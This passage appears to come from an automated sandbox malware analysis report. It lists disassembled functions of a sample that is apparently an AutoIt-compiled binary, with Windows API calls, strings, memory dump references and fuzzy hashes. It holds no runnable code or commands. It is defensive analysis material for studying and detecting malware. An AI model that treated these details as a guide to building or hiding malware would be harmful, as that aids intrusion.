                                                                            • Instruction Fuzzy Hash: EE014974200304ABCB129F68C886FADB778EF04311F108666F9119B2E1D771E809D756
                                                                            Function 0033B781 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 0033B7EF
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID: ComboBox$ListBox
                                                                            • API String ID: 3850602802-1403004172
                                                                            • Opcode ID: 4b6afb0d362b6e8eafc199d50c172b340b23c0f3e9bc8e137edd435194bcab23
                                                                            • Instruction ID: 674418039dcbab4e11832330b8460b1c8d5aaaa77b6e43b85a76b021af60ee42
                                                                            • Opcode Fuzzy Hash: 4b6afb0d362b6e8eafc199d50c172b340b23c0f3e9bc8e137edd435194bcab23
                                                                            • Instruction Fuzzy Hash: 5101B171651118ABCB06EBA4CCA29FEB36DAF46350B040719F5626B2D2EF745908C794
                                                                            Function 0033B67D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageW.USER32(?,00000180,00000000,?), ref: 0033B6EB
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID: ComboBox$ListBox
                                                                            • API String ID: 3850602802-1403004172
                                                                            • Opcode ID: df45e7fc436b3deeef225357fa5ea3af082ac07e929eadd7c8c454d44c3802ea
                                                                            • Instruction ID: 70319f135345f677d34ece5aa191393d2e033e8492be29dea10e84d31d09c4ca
                                                                            • Opcode Fuzzy Hash: df45e7fc436b3deeef225357fa5ea3af082ac07e929eadd7c8c454d44c3802ea
                                                                            • Instruction Fuzzy Hash: 320162B1641108ABDB07EBA4D9A3EFFB3AC9F05344F100219B602B71D2EF945E1897B5
                                                                            Function 0033B700 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageW.USER32(?,00000182,?,00000000), ref: 0033B76C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID: ComboBox$ListBox
                                                                            • API String ID: 3850602802-1403004172
                                                                            • Opcode ID: 9e665cdda9f684654f54f60db15602e7a0c396b9e220f252406fabf97cb5175a
                                                                            • Instruction ID: 19d3108c6d0ed75cd3653e19df25706ac3c84e5c5a190fe3517b6f7a68428b03
                                                                            • Opcode Fuzzy Hash: 9e665cdda9f684654f54f60db15602e7a0c396b9e220f252406fabf97cb5175a
                                                                            • Instruction Fuzzy Hash: 3A01ADB1641108ABDB03EBA4D9A3EFFB3AC9F05344F500219B902B71D2EB605E0987B5
                                                                            Function 00324D7C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: __calloc_crt
                                                                            • String ID: "<
                                                                            • API String ID: 3494438863-1827450427
                                                                            • Opcode ID: 4e2bd716e304d40023d1b5a7dae870261f1a1c889657eb0ef151f5f937103072
                                                                            • Instruction ID: 49c0e54b9b03eeefda6a8e246e4626516e21bcdd6e1ee163c2ba1a095a748b44
                                                                            • Opcode Fuzzy Hash: 4e2bd716e304d40023d1b5a7dae870261f1a1c889657eb0ef151f5f937103072
                                                                            • Instruction Fuzzy Hash: 82F0C271209B219AF7679B19BC41EA7B7D8EB04724F10491AF201CE296EB30D8818B94
                                                                            Function 00304024 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadImageW.USER32(00300000,00000063,00000001,00000010,00000010,00000000), ref: 00304048
                                                                            • EnumResourceNamesW.KERNEL32(00000000,0000000E,003467E9,00000063,00000000,76AB0280,?,?,00303EE1,?,?,000000FF), ref: 003741B3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: EnumImageLoadNamesResource
                                                                            • String ID: >0
                                                                            • API String ID: 1578290342-2200813389
                                                                            • Opcode ID: 60bf3fa15484789f03af7b53372133bc75379cc99479bf4e23f753b1ec77df97
                                                                            • Instruction ID: 9e3fcaf88cc60e18e83316c56e0e84124c195f3c0ec88e4f2ea56d08802a9f22
                                                                            • Opcode Fuzzy Hash: 60bf3fa15484789f03af7b53372133bc75379cc99479bf4e23f753b1ec77df97
                                                                            • Instruction Fuzzy Hash: FAF09071640324BBE2225B1AFC4AFD23FADE746BB5F100506F314EA1D1D3F4A080AB90
                                                                            Function 00347744 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: ClassName_wcscmp
                                                                            • String ID: #32770
                                                                            • API String ID: 2292705959-463685578
                                                                            • Opcode ID: cd2005e53f2b7c44726930f726fc12883546026691861c326a7d65dc598c9a49
                                                                            • Instruction ID: 088ced927e61c2a9fb8a2ab94f725bc5e4b20d52d7730c6d96b3197085432bf6
                                                                            • Opcode Fuzzy Hash: cd2005e53f2b7c44726930f726fc12883546026691861c326a7d65dc598c9a49
                                                                            • Instruction Fuzzy Hash: 22E0927760432827D721AAA5AC49ED7FBACEB51764F010056F905D7081E670A60187D4
                                                                            Function 0033A631 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 0033A63F
                                                                              • Part of subcall function 003213F1: _doexit.LIBCMT ref: 003213FB
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Message_doexit
                                                                            • String ID: AutoIt$Error allocating memory.
                                                                            • API String ID: 1993061046-4017498283
                                                                            • Opcode ID: 53a203d231d8a45e89dc332b4f9e559ba866bd07eb1221c61a7c389b56099bcf
                                                                            • Instruction ID: c3bc0ded0d8695ef63a500b93a79aa6dce40dfc5a5cc79e50b5069df51d49d6e
                                                                            • Opcode Fuzzy Hash: 53a203d231d8a45e89dc332b4f9e559ba866bd07eb1221c61a7c389b56099bcf
                                                                            • Instruction Fuzzy Hash: 3CD02E323C032833C21736A83C2BFCA364C8B19BA1F040022FB0C9D4D24AE28A8002E9
                                                                            Function 0037AE86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetSystemDirectoryW.KERNEL32(?), ref: 0037ACC0
                                                                            • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0037AEBD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: DirectoryFreeLibrarySystem
                                                                            • String ID: WIN_XPe
                                                                            • API String ID: 510247158-3257408948
                                                                            • Opcode ID: 5b21db80acc8599d8c0a759f661d788d082b7e04398c88ca3809db8181d02563
                                                                            • Instruction ID: 0001870e041e033e03787b182470ec278eb81331c284622b29dc0cfcc23a3d27
                                                                            • Opcode Fuzzy Hash: 5b21db80acc8599d8c0a759f661d788d082b7e04398c88ca3809db8181d02563
                                                                            • Instruction Fuzzy Hash: CEE06D70C00A0AEFCB27DBA4D9449ECB7BCAB88701F14C081E006F2560CB345A84DF22
                                                                            Function 00368698 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 003686A2
                                                                            • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 003686B5
                                                                              • Part of subcall function 00347A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00347AD0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: FindMessagePostSleepWindow
                                                                            • String ID: Shell_TrayWnd
                                                                            • API String ID: 529655941-2988720461
                                                                            • Opcode ID: d94c1e273096353a4ab536790d1d0260af43a603e8ade9c240794941992fd088
                                                                            • Instruction ID: 573052d76e597f901c385b8840732f2f280da1bb59683f8e6234509a3aa2298f
                                                                            • Opcode Fuzzy Hash: d94c1e273096353a4ab536790d1d0260af43a603e8ade9c240794941992fd088
                                                                            • Instruction Fuzzy Hash: ADD01231385328B7E27667709C0BFD67B5C9B05B21F100956F749AE1D0CAE4E940C754
                                                                            Function 003686CC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 003686E2
                                                                            • PostMessageW.USER32(00000000), ref: 003686E9
                                                                              • Part of subcall function 00347A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00347AD0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: FindMessagePostSleepWindow
                                                                            • String ID: Shell_TrayWnd
                                                                            • API String ID: 529655941-2988720461
                                                                            • Opcode ID: d82960153ec2148aab39fcacf33083a93c13db861f167c270d1943ec20c89c71
                                                                            • Instruction ID: ddb4b1cddfedcbfc0c8b709cded2d78bacf5fc4afb9a379807ed59b1127ab8ee
                                                                            • Opcode Fuzzy Hash: d82960153ec2148aab39fcacf33083a93c13db861f167c270d1943ec20c89c71
                                                                            • Instruction Fuzzy Hash: 84D0C9313853286BE26667709C0BFC66B589B05B21F500956B745AA1D0CAA4A9408759